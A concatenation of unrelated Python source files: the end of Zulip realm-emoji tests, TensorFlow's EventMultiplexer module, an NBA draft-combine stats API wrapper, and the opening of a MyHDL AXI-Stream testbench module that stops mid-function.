emojis = result.json()["emoji"]
self.assert_json_success(result)
self.assertEqual(len(emojis), 3)
def test_failed_file_upload(self) -> None:
email = self.example_email('iago')
self.login(email)
with mock.patch('zerver.lib.upload.write_local_file', side_effect=Exception()):
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_error(result, "Image file upload failed.")
def test_check_admin_realm_emoji(self) -> None:
        # Test that a user A is able to remove a realm emoji they uploaded
        # that has the same name as a deactivated realm emoji uploaded by some
        # other user B.
emoji_author_1 = self.example_user('cordelia')
self.create_test_emoji('test_emoji', emoji_author_1)
self.login(emoji_author_1.email)
result = self.client_delete('/json/realm/emoji/test_emoji')
self.assert_json_success(result)
emoji_author_2 = self.example_user('othello')
self.create_test_emoji('test_emoji', emoji_author_2)
self.login(emoji_author_2.email)
result = self.client_delete('/json/realm/emoji/test_emoji')
self.assert_json_success(result)
def test_check_admin_different_realm_emoji(self) -> None:
# Test that two different realm emojis in two different realms but
# having same name can be administered independently.
realm_1 = do_create_realm('test_realm', 'test_realm')
emoji_author_1 = do_create_user('[email protected]',
password='abc',
realm=realm_1,
full_name='abc',
short_name='abc')
self.create_test_emoji('test_emoji', emoji_author_1)
emoji_author_2 = self.example_user('othello')
self.create_test_emoji('test_emoji', emoji_author_2)
self.login(emoji_author_2.email)
result = self.client_delete('/json/realm/emoji/test_emoji')
self.assert_json_success(result)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides an interface for working with multiple event files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import six
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import directory_watcher
from tensorflow.python.summary.impl import io_wrapper
class EventMultiplexer(object):
"""An `EventMultiplexer` manages access to multiple `EventAccumulator`s.
Each `EventAccumulator` is associated with a `run`, which is a self-contained
TensorFlow execution. The `EventMultiplexer` provides methods for extracting
information about events from multiple `run`s.
Example usage for loading specific runs from files:
```python
x = EventMultiplexer({'run1': 'path/to/run1', 'run2': 'path/to/run2'})
x.Reload()
```
Example usage for loading a directory where each subdirectory is a run
```python
(eg:) /parent/directory/path/
/parent/directory/path/run1/
/parent/directory/path/run1/events.out.tfevents.1001
/parent/directory/path/run1/events.out.tfevents.1002
/parent/directory/path/run2/
/parent/directory/path/run2/events.out.tfevents.9232
/parent/directory/path/run3/
/parent/directory/path/run3/events.out.tfevents.9232
x = EventMultiplexer().AddRunsFromDirectory('/parent/directory/path')
(which is equivalent to:)
x = EventMultiplexer({'run1': '/parent/directory/path/run1', 'run2':...}
```
If you would like to watch `/parent/directory/path`, wait for it to be created
(if necessary) and then periodically pick up new runs, use
`AutoloadingMultiplexer`
@@__init__
@@AddRun
@@AddRunsFromDirectory
@@Reload
@@Runs
@@RunPaths
@@Scalars
@@Graph
@@MetaGraph
@@Histograms
@@CompressedHistograms
@@Images
@@Audio
"""
def __init__(self,
run_path_map=None,
size_guidance=event_accumulator.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True):
"""Constructor for the `EventMultiplexer`.
Args:
run_path_map: Dict `{run: path}` which specifies the
name of a run, and the path to find the associated events. If it is
None, then the EventMultiplexer initializes without any runs.
size_guidance: A dictionary mapping from `tagType` to the number of items
to store for each tag of that type. See
`event_accumulator.EventAccumulator` for details.
purge_orphaned_data: Whether to discard any events that were "orphaned" by
a TensorFlow restart.
"""
self._accumulators_mutex = threading.Lock()
self._accumulators = {}
self._paths = {}
self._reload_called = False
self._size_guidance = size_guidance
self.purge_orphaned_data = purge_orphaned_data
if run_path_map is not None:
for (run, path) in six.iteritems(run_path_map):
self.AddRun(path, run)
def AddRun(self, path, name=None):
"""Add a run to the multiplexer.
If the name is not specified, it is the same as the path.
If a run by that name exists, and we are already watching the right path,
do nothing. If we are watching a different path, replace the event
accumulator.
If `Reload` has been called, it will `Reload` the newly created
accumulators.
Args:
path: Path to the event files (or event directory) for given run.
name: Name of the run to add. If not provided, is set to path.
Returns:
The `EventMultiplexer`.
"""
    if name is None or name == '':
name = path
accumulator = None
with self._accumulators_mutex:
if name not in self._accumulators or self._paths[name] != path:
if name in self._paths and self._paths[name] != path:
# TODO(danmane) - Make it impossible to overwrite an old path with
# a new path (just give the new path a distinct name)
logging.warning('Conflict for name %s: old path %s, new path %s',
name, self._paths[name], path)
logging.info('Constructing EventAccumulator for %s', path)
accumulator = event_accumulator.EventAccumulator(
path,
size_guidance=self._size_guidance,
purge_orphaned_data=self.purge_orphaned_data)
self._accumulators[name] = accumulator
self._paths[name] = path
if accumulator:
if self._reload_called:
accumulator.Reload()
return self
def AddRunsFromDirectory(self, path, name=None):
"""Load runs from a directory; recursively walks subdirectories.
If path doesn't exist, no-op. This ensures that it is safe to call
`AddRunsFromDirectory` multiple times, even before the directory is made.
If path is a directory, load event files in the directory (if any exist) and
    recursively call AddRunsFromDirectory on any subdirectories. This means you
can call AddRunsFromDirectory at the root of a tree of event logs and
TensorBoard will load them all.
If the `EventMultiplexer` is already loaded this will cause
the newly created accumulators to `Reload()`.
Args:
path: A string path to a directory to load runs from.
name: Optionally, what name to apply to the runs. If name is provided
and the directory contains run subdirectories, the name of each subrun
is the concatenation of the parent name and the subdirectory name. If
        name is provided and the directory contains event files, then a run
        named "name" is added with the events from the path.
Raises:
ValueError: If the path exists and isn't a directory.
Returns:
The `EventMultiplexer`.
"""
for subdir in GetLogdirSubdirectories(path):
logging.info('Adding events from directory %s', subdir)
rpath = os.path.relpath(subdir, path)
subname = os.path.join(name, rpath) if name else rpath
self.AddRun(subdir, name=subname)
return self
def Reload(self):
"""Call `Reload` on every `EventAccumulator`."""
self._reload_called = True
    # Build a list so we're safe even if the set of accumulators is modified
    # while we're reloading.
with self._accumulators_mutex:
items = list(self._accumulators.items())
names_to_delete = set()
for name, accumulator in items:
try:
accumulator.Reload()
except (OSError, IOError) as e:
logging.error("Unable to reload accumulator '%s': %s", name, e)
except directory_watcher.DirectoryDeletedError:
names_to_delete.add(name)
with self._accumulators_mutex:
for name in names_to_delete:
logging.warning("Deleting accumulator '%s'", name)
del self._accumulators[name]
return self
def FirstEventTimestamp(self, run):
"""Return the timestamp of the first event of the given run.
This may perform I/O if no events have been loaded yet for the run.
Args:
run: A string name of the run for which the timestamp is retrieved.
Returns:
The wall_time of the first event of the run, which will typically be
seconds since the epoch.
Raises:
KeyError: If the run is not found.
ValueError: If the run has no events loaded and there are no events on
disk to load.
"""
accumulator = self._GetAccumulator(run)
return accumulator.FirstEventTimestamp()
def Scalars(self, run, tag):
"""Retrieve the scalar events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.ScalarEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Scalars(tag)
def Graph(self, run):
"""Retrieve the graph associated with the provided run.
Args:
run: A string name of a run to load the graph for.
Raises:
KeyError: If the run is not found.
ValueError: If the run does not have an associated graph.
Returns:
The `GraphDef` protobuf data structure.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Graph()
def MetaGraph(self, run):
"""Retrieve the metagraph associated with the provided run.
Args:
run: A string name of a run to load the graph for.
Raises:
KeyError: If the run is not found.
ValueError: If the run does not have an associated graph.
Returns:
The `MetaGraphDef` protobuf data structure.
"""
accumulator = self._GetAccumulator(run)
return accumulator.MetaGraph()
def RunMetadata(self, run, tag):
"""Get the session.run() metadata associated with a TensorFlow run and tag.
Args:
run: A string name of a TensorFlow run.
tag: A string name of the tag associated with a particular session.run().
Raises:
KeyError: If the run is not found, or the tag is not available for the
given run.
Returns:
The metadata in the form of `RunMetadata` protobuf data structure.
"""
accumulator = self._GetAccumulator(run)
return accumulator.RunMetadata(tag)
def Histograms(self, run, tag):
"""Retrieve the histogram events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.HistogramEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Histograms(tag)
def CompressedHistograms(self, run, tag):
"""Retrieve the compressed histogram events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.CompressedHistogramEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.CompressedHistograms(tag)
def Images(self, run, tag):
"""Retrieve the image events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.ImageEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Images(tag)
def Audio(self, run, tag):
"""Retrieve the audio events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.AudioEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Audio(tag)
def Runs(self):
"""Return all the run names in the `EventMultiplexer`.
Returns:
```
{runName: { images: [tag1, tag2, tag3],
scalarValues: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
compressedHistograms: [tagX, tagY, tagZ],
graph: true, meta_graph: true}}
```
"""
with self._accumulators_mutex:
# To avoid nested locks, we construct a copy of the run-accumulator map
items = list(six.iteritems(self._accumulators))
return {run_name: accumulator.Tags() for run_name, accumulator in items}
def RunPaths(self):
"""Returns a dict mapping run names to event file paths."""
return self._paths
def _GetAccumulator(self, run):
with self._accumulators_mutex:
return self._accumulators[run]
def GetLogdirSubdirectories(path):
"""Returns subdirectories with event files on path."""
if io_wrapper.Exists(path) and not io_wrapper.IsDirectory(path):
raise ValueError('GetLogdirSubdirectories: path exists and is not a '
'directory, %s' % path)
# ListRecursively just yields nothing if the path doesn't exist.
return (
subdir
for (subdir, files) in io_wrapper.ListRecursively(path)
if list(filter(event_accumulator.IsTensorFlowEventsFile, files))
)
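# --- Hedged usage sketch (not part of the original module) ---
# Mirrors the workflow described in the `EventMultiplexer` docstring above:
# discover run subdirectories, load their event files, then inspect the tags
# each run provides. The log directory path is a hypothetical placeholder.
if __name__ == '__main__':
  multiplexer = EventMultiplexer(purge_orphaned_data=True)
  multiplexer.AddRunsFromDirectory('/tmp/example_logdir')  # hypothetical path
  multiplexer.Reload()
  for run_name, tags in six.iteritems(multiplexer.Runs()):
    print('run %s provides tags: %s' % (run_name, tags))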
|
|
import requests as _requests
from goldsberry._apiFunc import *
class anthro:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombineplayeranthro?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season),
}
self._pull = _requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID -
TEMP_PLAYER_ID -
PLAYER_NAME -
FIRST_NAME -
LAST_NAME -
POSITION - Projected Position of the Prospect
BODY_FAT_PCT - Body Fat Percentage
HAND_LENGTH - Length of the Prospect's hand
in inches. The measurement is taken from the bottom of the
player's palm to the tip of his middle finger.
            HAND_WIDTH - Width of the Prospect's hand in
inches. The measurement is taken from the player's outstretched
hand from the tip of the thumb to tip of the pinky finger.
HEIGHT_WO_SHOES_FT_IN - Height of the player
without wearing shoes.
HEIGHT_WO_SHOES -
HEIGHT_W_SHOES_FT_IN - Height of the player
while in shoes.
HEIGHT_W_SHOES -
STANDING_REACH_FT_IN - The reach in inches
of the player while standing still. The player reaches straight
up to his highest point.
STANDING_REACH -
WEIGHT - The weight of the player in pounds.
WINGSPAN_FT_IN - The player stretches his arms
horizontally and a measure is made from the tip of his left hand
to the tip of his right hand.
WINGSPAN -
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class agility:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinedrillresults?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
        self._pull = _requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID --
TEMP_PLAYER_ID --
PLAYER_NAME --
FIRST_NAME --
LAST_NAME --
POSITION -- Projected Position of the Prospect
LANE_AGILITY_TIME -- Lane Agility (seconds) - This drill measures
lateral quickness and the player's agility.
MODIFIED_LANE_AGILITY_TIME -- Shuttle Run (seconds) - This measures a
player's agility and ability to change directions.
THREE_QUARTER_SPRINT -- Three Quarter Sprint (seconds) - A player is
timed in a sprint from the baseline to 3/4th the length of the
court.
STANDING_VERTICAL_LEAP -- Standing (inches) - The vertical leap of a
player with no running start.
MAX_VERTICAL_LEAP -- Max Vertical Leap (inches) - The vertical leap
of a player with a few steps to start and gather his leap.
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class non_stationary_shooting:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinenonstationaryshooting?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
        self._pull = _requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID --
TEMP_PLAYER_ID --
PLAYER_NAME --
FIRST_NAME --
LAST_NAME --
POSITION -- Projected Position of the Prospect
OFF_DRIB_COLLEGE_BREAK_LEFT_MADE --
OFF_DRIB_COLLEGE_BREAK_LEFT_ATTEMPT --
OFF_DRIB_COLLEGE_BREAK_LEFT_PCT -- Off Dribble College Break Left - A player takes six
shots coming off the dribble from the left break area of the court. The shot is from
about the distance of a college three pointer (20 ft. 9 in.).
OFF_DRIB_COLLEGE_BREAK_RIGHT_MADE --
OFF_DRIB_COLLEGE_BREAK_RIGHT_ATTEMPT --
OFF_DRIB_COLLEGE_BREAK_RIGHT_PCT -- Off Dribble College Break Right - A player takes six
shots coming off the dribble from the right break area of the court. The shot is from
about the distance of a college three pointer (20 ft. 9 in.).
OFF_DRIB_COLLEGE_TOP_KEY_MADE --
OFF_DRIB_COLLEGE_TOP_KEY_ATTEMPT --
OFF_DRIB_COLLEGE_TOP_KEY_PCT -- Off Dribble College Top Key - A player takes six shots
coming off the dribble from the top of the key. The shot is from about the distance
of a college three pointer (20 ft. 9 in.).
OFF_DRIB_FIFTEEN_BREAK_LEFT_MADE --
OFF_DRIB_FIFTEEN_BREAK_LEFT_ATTEMPT --
OFF_DRIB_FIFTEEN_BREAK_LEFT_PCT -- Off Dribble Fifteen Break Left - A player takes six
shots coming off the dribble from 15 feet away from the basket on the left break
area of the court.
OFF_DRIB_FIFTEEN_BREAK_RIGHT_MADE --
OFF_DRIB_FIFTEEN_BREAK_RIGHT_ATTEMPT --
OFF_DRIB_FIFTEEN_BREAK_RIGHT_PCT -- Off Dribble Fifteen Break Right - A player takes six
shots coming off the dribble from 15 feet away from the basket on the right break area
of the court.
OFF_DRIB_FIFTEEN_TOP_KEY_MADE --
OFF_DRIB_FIFTEEN_TOP_KEY_ATTEMPT --
OFF_DRIB_FIFTEEN_TOP_KEY_PCT -- Off Dribble Fifteen Top Key - A player takes six shots
coming off the dribble from 15 feet out at the top of the key.
ON_MOVE_COLLEGE_MADE --
ON_MOVE_COLLEGE_ATTEMPT --
ON_MOVE_COLLEGE_PCT -- On the Move College - 35 seconds to attempt as many shots as time
allows from college 3-pt range (20 ft. 9 in.) while moving between spots (corners
and elbows from both sides).
ON_MOVE_FIFTEEN_MADE --
ON_MOVE_FIFTEEN_ATTEMPT --
ON_MOVE_FIFTEEN_PCT -- On the Move Fifteen - 35 seconds to attempt as many shots as time
allows from 15 feet while moving between spots (corners and elbows from both sides).
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class spot_up_shooting:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinespotshooting?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
        self._pull = _requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID --
TEMP_PLAYER_ID --
PLAYER_NAME --
FIRST_NAME --
LAST_NAME --
POSITION -- Projected Position of the Prospect
NBA_BREAK_LEFT_MADE --
NBA_BREAK_LEFT_ATTEMPT --
NBA_BREAK_LEFT_PCT -- NBA Break Left - A player takes five shots
from the left break area of the court. The shot is from the
distance of an NBA three pointer (23 ft. 9 in.)
NBA_BREAK_RIGHT_MADE --
NBA_BREAK_RIGHT_ATTEMPT --
NBA_BREAK_RIGHT_PCT -- NBA Break Right - A player takes five shots
from the right break area of the court. The shot is from the
distance of an NBA three pointer (23 ft. 9 in.)
NBA_CORNER_LEFT_MADE --
NBA_CORNER_LEFT_ATTEMPT --
NBA_CORNER_LEFT_PCT -- NBA Corner Left - A player takes five shots
from the left corner area of the court. The shot is from the
distance of an NBA three pointer (23 ft. 9 in.)
NBA_CORNER_RIGHT_MADE --
NBA_CORNER_RIGHT_ATTEMPT --
NBA_CORNER_RIGHT_PCT -- NBA Corner Right - A player takes five
shots from the right corner area of the court. The shot is from
the distance of an NBA three pointer (23 ft. 9 in.)
NBA_TOP_KEY_MADE --
NBA_TOP_KEY_ATTEMPT --
NBA_TOP_KEY_PCT -- NBA Top Key - A player takes five shots from top
of the key. The shot is from the distance of an NBA three
pointer (23 ft. 9 in.)
COLLEGE_BREAK_LEFT_MADE --
COLLEGE_BREAK_LEFT_ATTEMPT --
COLLEGE_BREAK_LEFT_PCT -- College Break Left - A player takes five
shots from the left break area of the court. The shot is from
the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_BREAK_RIGHT_MADE --
COLLEGE_BREAK_RIGHT_ATTEMPT --
COLLEGE_BREAK_RIGHT_PCT -- College Break Right - A player takes
five shots from the right break area of the court. The shot is
from the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_CORNER_LEFT_MADE --
COLLEGE_CORNER_LEFT_ATTEMPT --
COLLEGE_CORNER_LEFT_PCT -- College Corner Left - A player takes
five shots from the left corner area of the court. The shot is
from the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_CORNER_RIGHT_MADE --
COLLEGE_CORNER_RIGHT_ATTEMPT --
COLLEGE_CORNER_RIGHT_PCT -- College Corner Right - A player takes
five shots from the right corner area of the court. The shot is
from the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_TOP_KEY_MADE --
COLLEGE_TOP_KEY_ATTEMPT --
COLLEGE_TOP_KEY_PCT -- College Top Key - A player takes five shots
from the top of the key. The shot is from the distance of a
college three pointer (20 ft. 9 in.).
FIFTEEN_BREAK_LEFT_MADE --
FIFTEEN_BREAK_LEFT_ATTEMPT --
FIFTEEN_BREAK_LEFT_PCT -- Fifteen Break Left - A player takes five
shots from the left break and 15 feet away from the basket.
FIFTEEN_BREAK_RIGHT_MADE --
FIFTEEN_BREAK_RIGHT_ATTEMPT --
FIFTEEN_BREAK_RIGHT_PCT -- Fifteen Break Right - A player takes
five shots from the right break and 15 feet away from the
basket.
FIFTEEN_CORNER_LEFT_MADE --
FIFTEEN_CORNER_LEFT_ATTEMPT --
FIFTEEN_CORNER_LEFT_PCT -- Fifteen Corner Left - A player takes
five shots from the left baseline and 15 feet away from the
basket.
FIFTEEN_CORNER_RIGHT_MADE --
FIFTEEN_CORNER_RIGHT_ATTEMPT --
FIFTEEN_CORNER_RIGHT_PCT -- Fifteen Corner Right - A player takes
five shots from the right baseline and 15 feet away from the
basket.
FIFTEEN_TOP_KEY_MADE --
FIFTEEN_TOP_KEY_ATTEMPT --
FIFTEEN_TOP_KEY_PCT -- Fifteen Top Key - A player takes five shots
from the top of the key and 15 feet away from the basket.
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class combine:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinestats?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
        self._pull = _requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
SEASON --
PLAYER_ID --
FIRST_NAME --
LAST_NAME --
PLAYER_NAME --
POSITION --
HEIGHT_WO_SHOES --
HEIGHT_WO_SHOES_FT_IN --
HEIGHT_W_SHOES --
HEIGHT_W_SHOES_FT_IN --
WEIGHT --
WINGSPAN --
WINGSPAN_FT_IN --
STANDING_REACH --
STANDING_REACH_FT_IN --
BODY_FAT_PCT --
HAND_LENGTH --
HAND_WIDTH --
STANDING_VERTICAL_LEAP --
MAX_VERTICAL_LEAP --
LANE_AGILITY_TIME --
MODIFIED_LANE_AGILITY_TIME --
THREE_QUARTER_SPRINT --
SPOT_FIFTEEN_CORNER_LEFT --
SPOT_FIFTEEN_BREAK_LEFT --
SPOT_FIFTEEN_TOP_KEY --
SPOT_FIFTEEN_BREAK_RIGHT --
SPOT_FIFTEEN_CORNER_RIGHT --
SPOT_COLLEGE_CORNER_LEFT --
SPOT_COLLEGE_BREAK_LEFT --
SPOT_COLLEGE_TOP_KEY --
SPOT_COLLEGE_BREAK_RIGHT --
SPOT_COLLEGE_CORNER_RIGHT --
SPOT_NBA_CORNER_LEFT --
SPOT_NBA_BREAK_LEFT --
SPOT_NBA_TOP_KEY --
SPOT_NBA_BREAK_RIGHT --
SPOT_NBA_CORNER_RIGHT --
OFF_DRIB_FIFTEEN_BREAK_LEFT --
OFF_DRIB_FIFTEEN_TOP_KEY --
OFF_DRIB_FIFTEEN_BREAK_RIGHT --
OFF_DRIB_COLLEGE_BREAK_LEFT --
OFF_DRIB_COLLEGE_TOP_KEY --
OFF_DRIB_COLLEGE_BREAK_RIGHT --
ON_MOVE_FIFTEEN --
ON_MOVE_COLLEGE --
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
__all__ = ['anthro', 'agility', 'non_stationary_shooting', 'spot_up_shooting', 'combine']
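# --- Hedged usage sketch (not part of the original module) ---
# The docstrings above recommend wrapping each .data() result in a pandas
# DataFrame; this shows that pattern for the anthro endpoint. Constructing the
# object issues a request to stats.nba.com, so network access is required, and
# pandas is an assumed extra dependency. Column names follow the headers
# documented in the docstring (e.g. PLAYER_NAME, WINGSPAN).
if __name__ == '__main__':
    import pandas as pd  # assumed to be available
    anthro_2014 = anthro(season='2014', league='NBA')
    df = pd.DataFrame(anthro_2014.data())
    print(df.head())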
|
|
"""
Copyright (c) 2014-2018 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
skip_asserts = False
class AXIStreamFrame(object):
def __init__(self, data=b'', keep=None, id=None, dest=None, user=None, last_cycle_user=None):
self.B = 0
self.N = 8
self.M = 1
self.WL = 8
self.data = b''
self.keep = None
self.id = 0
self.dest = 0
self.user = None
self.last_cycle_user = None
if type(data) in (bytes, bytearray):
self.data = bytearray(data)
self.keep = keep
self.id = id
self.dest = dest
self.user = user
self.last_cycle_user = last_cycle_user
elif type(data) is AXIStreamFrame:
self.N = data.N
self.WL = data.WL
if type(data.data) is bytearray:
self.data = bytearray(data.data)
else:
self.data = list(data.data)
if data.keep is not None:
self.keep = list(data.keep)
if data.id is not None:
if type(data.id) in (int, bool):
self.id = data.id
else:
self.id = list(data.id)
if data.dest is not None:
if type(data.dest) in (int, bool):
self.dest = data.dest
else:
self.dest = list(data.dest)
if data.user is not None:
if type(data.user) in (int, bool):
self.user = data.user
else:
self.user = list(data.user)
self.last_cycle_user = data.last_cycle_user
else:
self.data = list(data)
self.keep = keep
self.id = id
self.dest = dest
self.user = user
self.last_cycle_user = last_cycle_user
def build(self):
if self.data is None:
return
f = list(self.data)
tdata = []
tkeep = []
tid = []
tdest = []
tuser = []
i = 0
while len(f) > 0:
if self.B == 0:
data = 0
keep = 0
for j in range(self.M):
data = data | (f.pop(0) << (j*self.WL))
keep = keep | (1 << j)
if len(f) == 0: break
tdata.append(data)
if self.keep is None:
tkeep.append(keep)
else:
tkeep.append(self.keep[i])
else:
# multiple tdata signals
data = 0
tdata.append(f.pop(0))
tkeep.append(0)
if self.id is None:
tid.append(0)
elif type(self.id) is int:
tid.append(self.id)
else:
tid.append(self.id[i])
if self.dest is None:
tdest.append(0)
elif type(self.dest) is int:
tdest.append(self.dest)
else:
tdest.append(self.dest[i])
if self.user is None:
tuser.append(0)
elif type(self.user) is int:
tuser.append(self.user)
else:
tuser.append(self.user[i])
i += 1
if self.last_cycle_user:
tuser[-1] = self.last_cycle_user
return tdata, tkeep, tid, tdest, tuser
def parse(self, tdata, tkeep, tid, tdest, tuser):
if tdata is None or tkeep is None or tuser is None:
return
if len(tdata) != len(tkeep) or len(tdata) != len(tid) or len(tdata) != len(tdest) or len(tdata) != len(tuser):
raise Exception("Invalid data")
self.data = []
self.keep = []
self.id = []
self.dest = []
self.user = []
if self.B == 0:
mask = 2**self.WL-1
for i in range(len(tdata)):
for j in range(self.M):
if tkeep[i] & (1 << j):
self.data.append((tdata[i] >> (j*self.WL)) & mask)
self.keep.append(tkeep[i])
self.id.append(tid[i])
self.dest.append(tdest[i])
self.user.append(tuser[i])
else:
for i in range(len(tdata)):
self.data.append(tdata[i])
self.keep.append(tkeep[i])
self.id.append(tid[i])
self.dest.append(tdest[i])
self.user.append(tuser[i])
if self.WL == 8:
self.data = bytearray(self.data)
self.last_cycle_user = self.user[-1]
def __eq__(self, other):
if not isinstance(other, AXIStreamFrame):
return False
if self.data != other.data:
return False
if self.keep is not None and other.keep is not None:
if self.keep != other.keep:
return False
if self.id is not None and other.id is not None:
if type(self.id) in (int, bool) and type(other.id) is list:
for k in other.id:
if self.id != k:
return False
elif type(other.id) in (int, bool) and type(self.id) is list:
for k in self.id:
if other.id != k:
return False
elif self.id != other.id:
return False
if self.dest is not None and other.dest is not None:
if type(self.dest) in (int, bool) and type(other.dest) is list:
for k in other.dest:
if self.dest != k:
return False
elif type(other.dest) in (int, bool) and type(self.dest) is list:
for k in self.dest:
if other.dest != k:
return False
elif self.dest != other.dest:
return False
if self.last_cycle_user is not None and other.last_cycle_user is not None:
if self.last_cycle_user != other.last_cycle_user:
return False
if self.user is not None and other.user is not None:
if type(self.user) in (int, bool) and type(other.user) is list:
for k in other.user[:-1]:
if self.user != k:
return False
elif type(other.user) in (int, bool) and type(self.user) is list:
for k in self.user[:-1]:
if other.user != k:
return False
elif self.user != other.user:
return False
else:
if self.user is not None and other.user is not None:
if type(self.user) in (int, bool) and type(other.user) is list:
for k in other.user:
if self.user != k:
return False
elif type(other.user) in (int, bool) and type(self.user) is list:
for k in self.user:
if other.user != k:
return False
elif self.user != other.user:
return False
return True
def __repr__(self):
return (
('AXIStreamFrame(data=%s, ' % repr(self.data)) +
('keep=%s, ' % repr(self.keep)) +
('id=%s, ' % repr(self.id)) +
('dest=%s, ' % repr(self.dest)) +
('user=%s, ' % repr(self.user)) +
('last_cycle_user=%s)' % repr(self.last_cycle_user))
)
def __iter__(self):
return self.data.__iter__()
class AXIStreamSource(object):
def __init__(self):
self.has_logic = False
self.queue = []
def send(self, frame):
self.queue.append(AXIStreamFrame(frame))
def write(self, data):
self.send(data)
def count(self):
return len(self.queue)
def empty(self):
return not self.queue
def create_logic(self,
clk,
rst,
tdata=None,
tkeep=Signal(bool(True)),
tvalid=Signal(bool(False)),
tready=Signal(bool(True)),
tlast=Signal(bool(False)),
tid=Signal(intbv(0)),
tdest=Signal(intbv(0)),
tuser=Signal(intbv(0)),
pause=0,
name=None
):
assert not self.has_logic
self.has_logic = True
tready_int = Signal(bool(False))
tvalid_int = Signal(bool(False))
@always_comb
def pause_logic():
tready_int.next = tready and not pause
